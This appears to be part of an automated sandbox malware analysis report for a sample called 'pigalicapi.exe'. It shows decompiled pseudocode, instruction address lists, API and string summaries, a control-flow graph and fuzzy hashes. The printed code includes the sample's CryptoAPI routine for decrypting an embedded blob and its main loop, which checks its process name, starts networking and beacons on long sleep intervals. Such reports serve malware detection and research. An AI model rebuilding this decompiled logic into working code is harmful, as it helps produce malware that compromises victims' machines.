                                                                                                                                                                                                                                                                          									_v808 = CryptDecrypt(_v804, 0, 1, 0,  &_v764,  &_v812);
                                                                                                                                                                                                                                                                          									CryptDestroyKey(_v804);
                                                                                                                                                                                                                                                                          									if(_v808 != 0) {
                                                                                                                                                                                                                                                                          										_t73 =  &_v816;
                                                                                                                                                                                                                                                                          										__imp__CryptCreateHash(_v12, 0x8003, 0, 0, _t73);
                                                                                                                                                                                                                                                                          										if(_t73 != 0) {
                                                                                                                                                                                                                                                                          											_t74 = _v816;
                                                                                                                                                                                                                                                                          											__imp__CryptHashData(_t74,  &_v780, 0x2f0, 0);
                                                                                                                                                                                                                                                                          											if(_t74 != 0) {
                                                                                                                                                                                                                                                                          												_v820 = 0;
                                                                                                                                                                                                                                                                          												_v824 = 4;
                                                                                                                                                                                                                                                                          												_t76 = _v816;
                                                                                                                                                                                                                                                                          												__imp__CryptGetHashParam(_t76, 4,  &_v820,  &_v824, 0);
                                                                                                                                                                                                                                                                          												if(_t76 != 0) {
                                                                                                                                                                                                                                                                          													_v828 = 0x10;
                                                                                                                                                                                                                                                                          													_t77 = _v816;
                                                                                                                                                                                                                                                                          													__imp__CryptGetHashParam(_t77, 2,  &_v844,  &_v828, 0);
                                                                                                                                                                                                                                                                          													if(_t77 != 0) {
                                                                                                                                                                                                                                                                          														_t78 = E04007C70( &_v28,  &_v844,  &_v28, 0x10);
                                                                                                                                                                                                                                                                          														_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          														if((_t78 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          															E04007B70(_a12,  &_v780, 0x300);
                                                                                                                                                                                                                                                                          															_t109 = _t109 + 0xc;
                                                                                                                                                                                                                                                                          															_v5 = 1;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											__imp__CryptDestroyHash(_v816);
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v796);
                                                                                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L25;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}































                                                                                                                                                                                                                                                                          0x040047f9
                                                                                                                                                                                                                                                                          0x04004801
                                                                                                                                                                                                                                                                          0x04004aab
                                                                                                                                                                                                                                                                          0x04004ab1
                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                          0x04004814
                                                                                                                                                                                                                                                                          0x0400482a
                                                                                                                                                                                                                                                                          0x04004832
                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                          0x04004850
                                                                                                                                                                                                                                                                          0x0400485a
                                                                                                                                                                                                                                                                          0x04004860
                                                                                                                                                                                                                                                                          0x0400486a
                                                                                                                                                                                                                                                                          0x04004874
                                                                                                                                                                                                                                                                          0x0400488f
                                                                                                                                                                                                                                                                          0x040048b9
                                                                                                                                                                                                                                                                          0x040048be
                                                                                                                                                                                                                                                                          0x040048c1
                                                                                                                                                                                                                                                                          0x040048c7
                                                                                                                                                                                                                                                                          0x040048cd
                                                                                                                                                                                                                                                                          0x040048eb
                                                                                                                                                                                                                                                                          0x040048f3
                                                                                                                                                                                                                                                                          0x04004a90
                                                                                                                                                                                                                                                                          0x04004a96
                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004889
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004a98
                                                                                                                                                                                                                                                                          0x040048fd
                                                                                                                                                                                                                                                                          0x0400490b
                                                                                                                                                                                                                                                                          0x04004913
                                                                                                                                                                                                                                                                          0x04004919
                                                                                                                                                                                                                                                                          0x0400492c
                                                                                                                                                                                                                                                                          0x0400493c
                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                          0x0400494a
                                                                                                                                                                                                                                                                          0x04004975
                                                                                                                                                                                                                                                                          0x04004982
                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                          0x04004995
                                                                                                                                                                                                                                                                          0x040049a9
                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                          0x040049c5
                                                                                                                                                                                                                                                                          0x040049cc
                                                                                                                                                                                                                                                                          0x040049d4
                                                                                                                                                                                                                                                                          0x040049da
                                                                                                                                                                                                                                                                          0x040049e4
                                                                                                                                                                                                                                                                          0x04004a00
                                                                                                                                                                                                                                                                          0x04004a07
                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                          0x04004a11
                                                                                                                                                                                                                                                                          0x04004a2d
                                                                                                                                                                                                                                                                          0x04004a34
                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                          0x04004a4b
                                                                                                                                                                                                                                                                          0x04004a50
                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                          0x04004a6a
                                                                                                                                                                                                                                                                          0x04004a6f
                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                          0x04004a72
                                                                                                                                                                                                                                                                          0x04004a58
                                                                                                                                                                                                                                                                          0x04004a3c
                                                                                                                                                                                                                                                                          0x04004a0f
                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                          0x04004a7d
                                                                                                                                                                                                                                                                          0x040049b1
                                                                                                                                                                                                                                                                          0x0400498f
                                                                                                                                                                                                                                                                          0x04004944
                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004a8a
                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                          0x04004aa5
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400485a

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400481F
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04004845
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                          • Instruction ID: 68028e15a08110d1318f396c41aabee13b9dff780772823a15a50aa733777c46
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42090ebe0b84d1e6b92d05052a41d8df984fe46a239ada941c44efd33afc4f41
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E71DF71A54318ABFB65CF50CC45BED77BCAB48B04F408598A605BA1C0DBB9ABC4CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 626 4003b00-4003b5c call 4001000 call 4003130 call 4002ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call 4004510 635 4003b62-4003c8c call 4007d20 call 4005700 call 4005a00 call 4007d20 call 4009400 call 40099f0 call 4006060 call 4005e00 StrStrIA call 4001120 call 4005e30 call 4006cf0 call 4005f30 call 4009b90 WSAStartup 626->635 636 400400a-400400c ExitProcess 626->636 635->636 663 4003c92-4003cb1 635->663 664 4003cc0-4003cc9 663->664 665 4003cb3-4003cbb 663->665 666 4003cda-4003ce3 664->666 667 4003ccb-4003cd4 664->667 665->664 668 4003cf4-4003cfd 666->668 669 4003ce5-4003cee 666->669 667->666 670 4003d0c-4003d15 668->670 671 4003cff-4003d07 668->671 669->668 672 4003d26-4003d2f 670->672 673 4003d17-4003d20 670->673 671->670 674 4003d40-4003dfd call 4007d20 call 400a700 call 400a4b0 call 4005b50 call 4008a70 672->674 675 4003d31-4003d3a 672->675 673->672 686 4003e49 674->686 687 4003dff-4003e3f call 4007d20 call 40078d0 674->687 675->674 688 4003e53-4003eab call 4007970 call 4004020 686->688 687->686 697 4003eb1-4003ed9 call 4004020 688->697 698 4003f8a 688->698 704 4003f81 697->704 705 4003edf-4003efa call 4004020 697->705 700 4003f91-4003f9a 698->700 702 4003f9c-4003fa3 700->702 703 4003fed-4003ffa Sleep 700->703 706 4003fd0-4003fd7 702->706 707 4003fa5-4003fac 702->707 703->688 709 4003f88 704->709 714 4003eff-4003f07 705->714 706->703 708 4003fd9-4003fe3 706->708 711 4003fc4 707->711 712 4003fae-4003fc2 707->712 708->703 709->700 713 4003fce 711->713 712->713 713->703 715 4003f78 714->715 716 4003f09-4003f50 call 40042e0 call 4004020 714->716 717 4003f7f 715->717 722 4003f52 716->722 723 4003f59-4003f60 716->723 717->709 722->723 724 4003f62-4003f70 VirtualFree 723->724 725 4003f76 723->725 724->725 725->717
                                                                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                                                                          			_entry_() {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				char _v1148;
                                                                                                                                                                                                                                                                          				signed char _v1149;
                                                                                                                                                                                                                                                                          				intOrPtr _v1156;
                                                                                                                                                                                                                                                                          				char _v1556;
                                                                                                                                                                                                                                                                          				char _v9556;
                                                                                                                                                                                                                                                                          				long _v9560;
                                                                                                                                                                                                                                                                          				char _v9564;
                                                                                                                                                                                                                                                                          				char _v12068;
                                                                                                                                                                                                                                                                          				signed int _v12072;
                                                                                                                                                                                                                                                                          				char _v12076;
                                                                                                                                                                                                                                                                          				long _v12080;
                                                                                                                                                                                                                                                                          				char _v12081;
                                                                                                                                                                                                                                                                          				long _v12088;
                                                                                                                                                                                                                                                                          				long _v12092;
                                                                                                                                                                                                                                                                          				long _v12096;
                                                                                                                                                                                                                                                                          				signed int _v12100;
                                                                                                                                                                                                                                                                          				signed char _v12101;
                                                                                                                                                                                                                                                                          				long _v12108;
                                                                                                                                                                                                                                                                          				signed int _v12112;
                                                                                                                                                                                                                                                                          				void* _v12116;
                                                                                                                                                                                                                                                                          				signed char _t69;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				signed char _t77;
                                                                                                                                                                                                                                                                          				signed char _t79;
                                                                                                                                                                                                                                                                          				signed int _t80;
                                                                                                                                                                                                                                                                          				signed char _t85;
                                                                                                                                                                                                                                                                          				signed char _t86;
                                                                                                                                                                                                                                                                          				signed char _t87;
                                                                                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                                                                                          				char* _t89;
                                                                                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                          				signed int _t100;
                                                                                                                                                                                                                                                                          				signed char _t102;
                                                                                                                                                                                                                                                                          				signed char _t104;
                                                                                                                                                                                                                                                                          				signed char _t106;
                                                                                                                                                                                                                                                                          				signed char _t110;
                                                                                                                                                                                                                                                                          				signed int _t116;
                                                                                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                                                                                          				char _t125;
                                                                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                                                                          				intOrPtr _t143;
                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                          				signed int _t161;
                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                                                          				void* _t173;
                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				E04001000(0x2f50);
                                                                                                                                                                                                                                                                          				_v8 = E04003130();
                                                                                                                                                                                                                                                                          				E04002ED0(_v8);
                                                                                                                                                                                                                                                                          				GetModuleFileNameA(0, "C:\Users\engineer\pigalicapi.exe", 0x208);
                                                                                                                                                                                                                                                                          				SetUnhandledExceptionFilter(E04005DB0); // executed
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0); // executed
                                                                                                                                                                                                                                                                          				_t69 = E04004510(_v8, 0x4013c88); // executed
                                                                                                                                                                                                                                                                          				_t165 = _t163 + 0xc;
                                                                                                                                                                                                                                                                          				if((_t69 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				E04007D20( &_v1148,  &_v1148, 0, 0x46b);
                                                                                                                                                                                                                                                                          				E04005700( &_v1148); // executed
                                                                                                                                                                                                                                                                          				_t143 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_t74 = E04005A00( &_v1148, _t143, 0xff); // executed
                                                                                                                                                                                                                                                                          				_v1156 = _t74;
                                                                                                                                                                                                                                                                          				E04007D20(_t74, "Kobucgekyxca", 0, 0x12c);
                                                                                                                                                                                                                                                                          				E04009400( &_v1148, "Kobucgekyxca", 0xa); // executed
                                                                                                                                                                                                                                                                          				_t77 = E040099F0(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435a = _t77;
                                                                                                                                                                                                                                                                          				 *0x401435d = E04006060(); // executed
                                                                                                                                                                                                                                                                          				_t79 = E04005E00(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435e = _t79;
                                                                                                                                                                                                                                                                          				_t80 = StrStrIA("C:\Users\engineer\pigalicapi.exe", "svchost.exe"); // executed
                                                                                                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                                                                                                          				 *0x4014362 =  ~( ~_t80);
                                                                                                                                                                                                                                                                          				E04001120("C:\Users\engineer\pigalicapi.exe", "pigalicapi",  *0x401435a & 0x000000ff,  *0x4014362 & 0x000000ff, 0x401436c); // executed
                                                                                                                                                                                                                                                                          				_t85 = E04005E30(0); // executed
                                                                                                                                                                                                                                                                          				 *0x401435b = _t85;
                                                                                                                                                                                                                                                                          				 *0x401435f = 1; // executed
                                                                                                                                                                                                                                                                          				_t86 = E04006CF0(); // executed
                                                                                                                                                                                                                                                                          				_v1149 = _t86;
                                                                                                                                                                                                                                                                          				_t87 = E04005F30(); // executed
                                                                                                                                                                                                                                                                          				 *0x401435c = _t87 & 0x000000ff | _v1149 & 0x000000ff;
                                                                                                                                                                                                                                                                          				_t88 = E04009B90(0xffffffff);
                                                                                                                                                                                                                                                                          				_t173 = _t165 + 0x50;
                                                                                                                                                                                                                                                                          				 *0x4014364 = _t88;
                                                                                                                                                                                                                                                                          				_t89 =  &_v1556;
                                                                                                                                                                                                                                                                          				_push(_t89);
                                                                                                                                                                                                                                                                          				_push(0x202); // executed
                                                                                                                                                                                                                                                                          				L0400B1E6(); // executed
                                                                                                                                                                                                                                                                          				if(_t89 != 0) {
                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_t125 =  *0x40119a8; // 0x1d
                                                                                                                                                                                                                                                                          					_v12081 = _t125;
                                                                                                                                                                                                                                                                          					 *0x4014378 = 0x10;
                                                                                                                                                                                                                                                                          					if(( *0x401435f & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t118 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t118 | 0x00000008;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435c & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t161 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t161 | 0x00000001;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t140 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t140 | 0x00000004;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x401435e & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t116 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t116 | 0x00000002;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(( *0x4014360 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t159 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t159 | 0x00000020;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t91 =  *0x4014361 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if(( *0x4014361 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_t138 =  *0x4014378; // 0x1b
                                                                                                                                                                                                                                                                          						 *0x4014378 = _t138 | 0x00000040;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v9564 = 0x9c3;
                                                                                                                                                                                                                                                                          					E04007D20(_t91,  &_v12068, 0, 0x9c4);
                                                                                                                                                                                                                                                                          					E0400A700();
                                                                                                                                                                                                                                                                          					E0400A4B0( &_v12068,  &_v9564, 0x4013cb6,  *0x4013cb4 & 0x0000ffff);
                                                                                                                                                                                                                                                                          					_v9560 = 0;
                                                                                                                                                                                                                                                                          					_t97 = E04005B50( &_v12068, ";",  &_v9560, 0); // executed
                                                                                                                                                                                                                                                                          					_v12072 = _t97;
                                                                                                                                                                                                                                                                          					_v12092 = 0;
                                                                                                                                                                                                                                                                          					_v12080 = 0;
                                                                                                                                                                                                                                                                          					_v12076 = 0x4b0;
                                                                                                                                                                                                                                                                          					_t98 = E04008A70(0x4012c34,  &_v12076, 0x4012ba8, 0x8c, 0x400e008, 0x254); // executed
                                                                                                                                                                                                                                                                          					_t177 = _t173 + 0x44;
                                                                                                                                                                                                                                                                          					if(_t98 != 0) {
                                                                                                                                                                                                                                                                          						E04007D20( &_v9556,  &_v9556, 0, 0x1f40);
                                                                                                                                                                                                                                                                          						E040078D0(0x4012c34, 0xc8,  &_v9556, 0xc8);
                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          						_v12092 =  &_v9556;
                                                                                                                                                                                                                                                                          						_v12080 = 0xc8;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v12088 = 0;
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					_v12101 = 0;
                                                                                                                                                                                                                                                                          					_v12108 = 0x1d4c0;
                                                                                                                                                                                                                                                                          					_v12096 = 0;
                                                                                                                                                                                                                                                                          					_t100 = E04007970( &_v12096); // executed
                                                                                                                                                                                                                                                                          					_v12100 = _t100;
                                                                                                                                                                                                                                                                          					_t102 = E04004020(_v12096, _v12100,  &_v1148, 1, 2, 0);
                                                                                                                                                                                                                                                                          					_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          					if((_t102 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v12101 = 1;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t104 = E04004020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                          						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                          						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							_v12101 = 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_t106 = E04004020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                          							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                          							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          								_v12101 = 1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v12116 = 0;
                                                                                                                                                                                                                                                                          								_v12112 = E040042E0( &_v12116);
                                                                                                                                                                                                                                                                          								_t110 = E04004020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                          								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                          								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          									_v12101 = 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                          									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2) {
                                                                                                                                                                                                                                                                          								 *0x40118a4 = 1;
                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							if( *0x40130e4 != 2) {
                                                                                                                                                                                                                                                                          								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                          								 *0x40118a4 = 2;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                          0x04003b08
                                                                                                                                                                                                                                                                          0x04003b12
                                                                                                                                                                                                                                                                          0x04003b19
                                                                                                                                                                                                                                                                          0x04003b2d
                                                                                                                                                                                                                                                                          0x04003b38
                                                                                                                                                                                                                                                                          0x04003b40
                                                                                                                                                                                                                                                                          0x04003b4f
                                                                                                                                                                                                                                                                          0x04003b54
                                                                                                                                                                                                                                                                          0x04003b5c
                                                                                                                                                                                                                                                                          0x0400400a
                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                          0x04003b70
                                                                                                                                                                                                                                                                          0x04003b7f
                                                                                                                                                                                                                                                                          0x04003b8c
                                                                                                                                                                                                                                                                          0x04003b9a
                                                                                                                                                                                                                                                                          0x04003ba2
                                                                                                                                                                                                                                                                          0x04003bb4
                                                                                                                                                                                                                                                                          0x04003bca
                                                                                                                                                                                                                                                                          0x04003bd2
                                                                                                                                                                                                                                                                          0x04003bd7
                                                                                                                                                                                                                                                                          0x04003be1
                                                                                                                                                                                                                                                                          0x04003be6
                                                                                                                                                                                                                                                                          0x04003beb
                                                                                                                                                                                                                                                                          0x04003bfa
                                                                                                                                                                                                                                                                          0x04003c02
                                                                                                                                                                                                                                                                          0x04003c06
                                                                                                                                                                                                                                                                          0x04003c2a
                                                                                                                                                                                                                                                                          0x04003c34
                                                                                                                                                                                                                                                                          0x04003c3c
                                                                                                                                                                                                                                                                          0x04003c41
                                                                                                                                                                                                                                                                          0x04003c48
                                                                                                                                                                                                                                                                          0x04003c4d
                                                                                                                                                                                                                                                                          0x04003c53
                                                                                                                                                                                                                                                                          0x04003c64
                                                                                                                                                                                                                                                                          0x04003c6c
                                                                                                                                                                                                                                                                          0x04003c71
                                                                                                                                                                                                                                                                          0x04003c74
                                                                                                                                                                                                                                                                          0x04003c79
                                                                                                                                                                                                                                                                          0x04003c7f
                                                                                                                                                                                                                                                                          0x04003c80
                                                                                                                                                                                                                                                                          0x04003c85
                                                                                                                                                                                                                                                                          0x04003c8c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                          0x04003c98
                                                                                                                                                                                                                                                                          0x04003c9e
                                                                                                                                                                                                                                                                          0x04003cb1
                                                                                                                                                                                                                                                                          0x04003cb3
                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                          0x04003cc9
                                                                                                                                                                                                                                                                          0x04003ccb
                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                          0x04003ce3
                                                                                                                                                                                                                                                                          0x04003ce5
                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                          0x04003cfd
                                                                                                                                                                                                                                                                          0x04003cff
                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                          0x04003d15
                                                                                                                                                                                                                                                                          0x04003d17
                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                          0x04003d26
                                                                                                                                                                                                                                                                          0x04003d2f
                                                                                                                                                                                                                                                                          0x04003d31
                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                          0x04003d40
                                                                                                                                                                                                                                                                          0x04003d58
                                                                                                                                                                                                                                                                          0x04003d60
                                                                                                                                                                                                                                                                          0x04003d80
                                                                                                                                                                                                                                                                          0x04003d88
                                                                                                                                                                                                                                                                          0x04003da7
                                                                                                                                                                                                                                                                          0x04003daf
                                                                                                                                                                                                                                                                          0x04003db5
                                                                                                                                                                                                                                                                          0x04003dbf
                                                                                                                                                                                                                                                                          0x04003dc9
                                                                                                                                                                                                                                                                          0x04003df3
                                                                                                                                                                                                                                                                          0x04003df8
                                                                                                                                                                                                                                                                          0x04003dfd
                                                                                                                                                                                                                                                                          0x04003e0d
                                                                                                                                                                                                                                                                          0x04003e2b
                                                                                                                                                                                                                                                                          0x04003e30
                                                                                                                                                                                                                                                                          0x04003e39
                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                          0x04003e49
                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                          0x04003e5a
                                                                                                                                                                                                                                                                          0x04003e64
                                                                                                                                                                                                                                                                          0x04003e75
                                                                                                                                                                                                                                                                          0x04003e7d
                                                                                                                                                                                                                                                                          0x04003e9e
                                                                                                                                                                                                                                                                          0x04003ea3
                                                                                                                                                                                                                                                                          0x04003eab
                                                                                                                                                                                                                                                                          0x04003f8a
                                                                                                                                                                                                                                                                          0x04003eb1
                                                                                                                                                                                                                                                                          0x04003ecc
                                                                                                                                                                                                                                                                          0x04003ed1
                                                                                                                                                                                                                                                                          0x04003ed9
                                                                                                                                                                                                                                                                          0x04003f81
                                                                                                                                                                                                                                                                          0x04003edf
